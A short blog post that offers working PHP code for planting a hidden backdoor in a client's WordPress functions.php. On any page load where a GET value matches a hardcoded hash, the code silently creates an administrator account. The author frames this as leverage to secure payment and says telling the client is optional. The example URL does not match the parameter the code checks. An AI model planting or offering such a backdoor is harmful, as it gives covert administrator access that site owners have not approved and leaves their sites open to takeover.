It usually sounds not good to having a backdoor not only in WP site but in any site. But it’s not always for the bad purpose. Sometimes, you wanna have backdoor in your client site so the you feel secure about the payment that you have to receive from your client and you are working on client’s server. It’s alternative way is that you start work on your own server and after the client approve the work, you just transfer the site to client’s server. But if client’s insist to work on their server, then you can even notify the client that you are having access to client’s site that you will remove after you got the payment. So, it’s a form of legal use of backdoor in a WordPress site.
So, for this purpose, I googled a lot of methods. But the one that I found the best was from wpcrafter. Worked great for me.
You need to put the below piece of code in your Functions.php file
add_action( 'wp_head', 'my_testing_backdoor' );
function my_testing_backdoor() {
if ( md5( $_GET['username-here'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'username-here' ) ) {
$user_id = wp_create_user( 'username-here', 'pass' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}After that, you can open a new tab and put this url over there;
yourwebsiteurl.com?username=goSo that’s it. Now a new user has been created in users. you can now access the site with your username and pass you set.
1 thought on “Installing backdoor in a WordPress site”
Any Time. Stephen 🙂